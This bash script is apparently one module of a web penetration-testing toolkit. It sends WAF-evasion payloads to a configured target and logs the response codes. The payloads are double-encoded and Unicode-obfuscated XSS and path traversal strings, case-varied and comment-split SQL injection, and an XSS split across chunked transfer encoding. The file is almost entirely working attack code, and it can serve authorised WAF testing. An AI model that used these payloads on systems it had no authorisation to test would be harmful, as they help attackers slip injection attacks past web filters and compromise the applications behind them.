#!/bin/bash
# Advanced WAF evasion - encoding tricks, chunked bypass, unicode normalization
SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
source "$SCRIPT_DIR/../config.sh"
OUT="$OUT/waf_advanced"
mkdir -p "$OUT"

echo '=== ADVANCED WAF EVASION ===' | tee "$OUT/summary.txt"

url_encode() { printf '%s' "$1" | python3 -c "import sys,urllib.parse; print(urllib.parse.quote(sys.stdin.read().strip()))"; }

# Double encoding
echo '--- Double Encoding ---' | tee -a "$OUT/summary.txt"
DOUBLE_ENC=(
  '%253cscript%253e'
  '%252e%252e%252f'
  '%2527 OR 1=1--'
  '%252527'
)
for p in "${DOUBLE_ENC[@]}"; do
  resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 8 "$TARGET/?q=$p")
  echo "[$resp] Double-encoded: $p" | tee -a "$OUT/summary.txt"
done

# Unicode normalization bypass
echo '' | tee -a "$OUT/summary.txt"
echo '--- Unicode Normalization ---' | tee -a "$OUT/summary.txt"
UNICODE=(
  '%EF%BC%9Cscript%EF%BC%9E'
  '%u003cscript%u003e'
  '\xc0\xaepasswd'
)
for p in "${UNICODE[@]}"; do
  resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 8 "$TARGET/?q=$p")
  echo "[$resp] Unicode: $p" | tee -a "$OUT/summary.txt"
done

# Case variation bypass
echo '' | tee -a "$OUT/summary.txt"
echo '--- Case Variation ---' | tee -a "$OUT/summary.txt"
CASES=(
  "<SCRIPT>alert(1)</SCRIPT>"
  "<ScRiPt>alert(1)</ScRiPt>"
  "' Or 1=1--"
  "' oR '1'='1"
  "SeLeCt * fRoM uSeRs"
)
for p in "${CASES[@]}"; do
  encoded=$(url_encode "$p")
  resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 8 "$TARGET/?q=$encoded")
  echo "[$resp] Case: $p" | tee -a "$OUT/summary.txt"
done

# Comment injection in SQL
echo '' | tee -a "$OUT/summary.txt"
echo '--- SQL Comment Injection ---' | tee -a "$OUT/summary.txt"
SQL_COMMENTS=(
  "1'/**/OR/**/1=1--"
  "1'/*!OR*/1=1--"
  "1'+OR+1=1--"
  "1'%0aOR%0a1=1--"
)
for p in "${SQL_COMMENTS[@]}"; do
  encoded=$(url_encode "$p")
  resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 8 "$TARGET/?id=$encoded")
  echo "[$resp] SQL comment: $p" | tee -a "$OUT/summary.txt"
done
# Note: 1' OR%001=1-- uses a null byte which is invalid in URLs - curl rejects it (000 expected)
echo "[SKIP] SQL comment: 1' OR%001=1-- (null byte in URL — curl rejects, not a WAF gap)" | tee -a "$OUT/summary.txt"

# Chunked encoding WAF bypass
echo '' | tee -a "$OUT/summary.txt"
echo '--- Chunked Transfer WAF Bypass ---' | tee -a "$OUT/summary.txt"
resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 10 -X POST "$TARGET/" \
  -H 'Transfer-Encoding: chunked' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-binary $'b\r\n<script>a</\r\nb\r\nscript>\r\n0\r\n\r\n')
echo "[$resp] Chunked XSS split across chunks" | tee -a "$OUT/summary.txt"

cat "$OUT/summary.txt"